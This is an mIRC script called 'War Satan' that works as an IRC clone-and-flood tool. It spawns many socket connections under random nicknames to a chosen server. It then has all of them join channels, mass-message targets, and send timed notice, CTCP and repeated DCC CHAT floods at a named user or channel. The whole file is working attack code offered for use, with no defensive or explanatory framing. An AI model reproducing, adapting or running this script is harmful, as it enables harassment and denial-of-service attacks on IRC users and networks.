   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   ;;War Satan;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   ;;By: WarPhayze;;;;;;;;;;;;;;;;;;;;;;;;;
   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   on *:load: {
     if ($version < 5.6) {
       echo -a [WS]  You Need 5.6+
       unload -rs $script | halt
     }
     else {
       echo -a ««War Satan»»
       echo -a Clones Active.
       set %vername ««War Satan»»
       set %screen ««War Satan»»
       set %tsunami ««War Satan»»
     }
   }
   menu channel,menubar {
     -
     &Clones :death
     -
   }
   alias death {
     set %CServer $$?="Server:"
     set %Ccount $$?="How Many:"
     set %Cport $$?="Port:"
     clone %ccount %cserver %cport
   }
   alias c.echo { echo -a [***] $1- }
   alias r.echo { aline @clonehelp [***] $1- }
   alias rhelp {
     window @clonehelp
     r.echo --------------------------------------------------------------------------
     r.echo ««War Satan»»
     r.echo War Clones
     r.echo --------------------------------------------------------------------------
   }
   alias clone {
     if ($1 == $null) { echo 15 -a * /clone: type /rhelp to find out the commands | return }
     if ($window(@clone) == $null) { window -e @clone 100 400 500 300 @clone | titlebar @clone (rebellion)(clonestatus) | /aline @clone %ver - Clone Command Window | /inc %ccount | /clonewindow }
     unset %c.server %c.port %ccount
     if ($1 isnum) { %c.count = $1 | %c.server = $2 | %c.port = $3 }
     else { %c.count = 1 | %c.server = $1 | %c.port = $2 }
     %c.inc = 0 | :start | inc %c.inc | if (%c.inc > %c.count) { return } | %c.sock = clone $+ $r(1,1000)
     :loop | if ($sock(%c.sock).name) { %c.sock = clone $+ $r(1,1000) | goto loop }
     if (%c.port) { sockopen %c.sock %c.server %c.port }
     else { %c.port = 6667 | sockopen %c.sock %c.server 6667 }
     goto start
   }
   on 1:CLOSE:@clone:/unset %ccount | /c.echo Don't Forget To Use This Later.
   menu @clone {
     -
     &Load More:/clone $$?="How many more?" %cserver %cport
     -
     &Join:/sockwrite -n clone* join $$?="Channel:"
     &Part:/sockwrite -n clone* part $$?="Channel:"
     &Disconnect:/unset %ccount | /sockwrite -n clone* quit leaving.
     Mass Msg &Nick:/sockwrite -n clone* privmsg $$?="Nick:" : $$?="Message:"
     Mass Msg &Chan:/sockwrite -n clone* privmsg $$?="Channel:" : $$?="Message:"
   }
   alias clonewindow {
     window -a @Cloners 200 5 270 170 @cloners
     aline @Cloners ««War Satan»» Clone(s) Status
     aline @Cloners =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     aline @Cloners [Clones loaded]: %ccount
     aline @Cloners [Status Clones]: (idle)
     aline @Cloners =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     aline @Cloners =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   }
   on 1:sockopen:clone*: {
     inc %ccount | /rline @cloners 3 [Clones loaded]: %ccount
     /rline @cloners 5 Clones Connected to Server
     aline -h @clone $sockname connected to %c.server ( $+ %c.port $+ )
     sockwrite -n $sockname user r r r  :blah
     sockwrite -n $sockname nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)

   }
   on 1:sockclose:clone*: { aline -h @clone $sockname disconnected | dec %ccount | /rline @cloners 4 [Status Clones]: $sockname disconnected | /rline @cloners 3 [Clones loaded]: %ccount }
   on 1:sockread:clone*:{
     if ($sockerr > 0) { return }
     :loop | sockread %tmp
     if ($sockbr == 0) { return }
     if ($gettok(%tmp,1,32) == ping) { sockwrite -n $sockname PONG $gettok(%tmp,2-,32) }
     goto loop
   }

   on 1:input:@clone:{
     if ($left($1,1) != /) { sockwrite -n clone* privmsg %c.last.join : $+ $1- | aline -h @clone msging %c.last.join with: $1- | halt }
     if ($2 == $null) { aline -h @clone * $1 $+ : Insufficient parameters | halt }
     if ($1 == /join) { %c.last.join = $2 | sockwrite -n clone* join $2- | aline -h @clone Joining $2- | halt  }
     if ($1 == /part) { sockwrite -n clone* part $2- | aline -h @clone Parting $2- | halt }
     if ($1 == /msg) { if ($3 == $null) { aline -h @clone * /msg: Insufficient parameters | halt } | sockwrite -n clone* privmsg $2 : $+ $3- | aline -h @clone Msging $2 with: $3- | halt }
     if ($1 == /notice) { if ($3 == $null) { aline -h @clone * /notice: Insufficient parameters | halt } | sockwrite -n clone* notice $2 : $+ $3- | aline -h @clone Noticing $2 with: $3- | halt }
     if ($1 == /ctcp) { if ($3 == $null) { aline -h @clone * /ctcp: Insufficient parameters | halt } | sockwrite -n clone* privmsg $2 : $+ $chr(1) $+ $3- $+ $chr(1) | aline -h @clone Ctcping $2 with: $3- | halt }
     if ($1 == /quit) { sockwrite -n clone* quit : $+ $2- | aline -h @clone Now quiting with msg: $2- | halt }
     if ($1 == /kill) { sockclose clone* [ $+ [ $2 ] ] | dec %c.count | aline -h @clone Killed clone $2 | halt }
     if ($1 == /noticeflood) { if ($2 == $null) { aline -h @clone **** /notice: Insufficient parameters | halt } | sockwrite -n clone* notice $2 : -------------------------------------------------------------------------------------------------- %vername ------------------ %vername --------------------------------------------------- %vername --------------- %vername ---------------- %vername --------------------- %vername ------------------------- %tsunami ----------------------------------------------------------------------------------------------------------  }
     if ($1 == /komboflood) { if ($2 == $null) { aline -h @clone **** /komboflood: Insufficient parameters | halt } |  c.echo KOMBO FLOODING $2  | /komboflood1 $2  }
     if ($1 == /clone) { if ($2 == $null) { aline -h @clone **** /clone: Insufficient parameters | halt } | c.echo loading clones | /clone $1 $2 $3 }
     aline -h @clone No such command $1 | halt
   }
   alias /komboflood1 {
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     /timer285 3 2  sockwrite -n clone* notice $$1 : %vername  %vername %vername %vername %vername %vername %vername %vername %vername %vername %vername %vername %vername
     /timer287 3 2 sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ PING $+ $chr(1) | sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     /timer289 3 2  sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ PING $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ PING $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Time $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Clientinfo $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Action $+ $chr(1)

   }
   alias /chattest  {
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* nick [r] $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
     sockwrite -n clone* privmsg $$1 : $+ $chr(001) $+ DCC CHAT chat  $longip($ip) 4501
   }
   alias /msgflood1 {
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     timer125 2 2 sockwrite -n clone* privmsg $$1 : %screen
     timer444 2 4  sockwrite -n clone* privmsg $$1 : %screen
     timer555 2 5 sockwrite -n clone* privmsg $$1 : %vername %vername %vername %vername
     timer888 2 6 sockwrite -n clone* privmsg $$1 : %screen
     timer1123 2 8  sockwrite -n clone* privmsg $$1 : %screen
     timer1231 2 9  sockwrite -n clone* privmsg $$1 : %vername %vername %vername %vername

   }

   alias /ctcpflood1 {
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     timer346 1 9 /ctcpflood2 $$1
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ xXxXxx $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ xXxXxxx $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Time $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Clientinfo $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Action $+ $chr(1)
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Finger $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ PING $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Time $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Clientinfo $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Action $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Finger $+ $chr(1)
   }
   alias ctcpflood2 {
     sockwrite -n clone* nick WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ xXxXxx $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ xXxXxxx $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Time $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Clientinfo $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Action $+ $chr(1)
     sockwrite -n clone* WaR- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Finger $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ PING $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Time $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Version $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Clientinfo $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Action $+ $chr(1)
     sockwrite -n clone* privmsg $$1 : $+ $chr(1) $+ Finger $+ $chr(1)
   }
   alias /noticeflood1 {
     timer342 2 2 /sockwrite -n clone* notice $$1 : 0,1-------------------------------------------------------------------------------------------------- %vername ------------------ %vername --------------------------------------------------- %vername --------------- %vername ---------------- %vername --------------------- %vername ------------------------- %tsunami ----------------------------------------------------------------------------------------------------------
     timer343 2 4  /sockwrite -n clone* notice $$1 : %screen
     sockwrite -n clone* nick Impulse- $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z) $+ $r(a,z)
     timer346 2 5  /sockwrite -n clone* notice $$1 : %screen
     timer347 2 6 /sockwrite -n clone* notice $$1 : %screen
   }
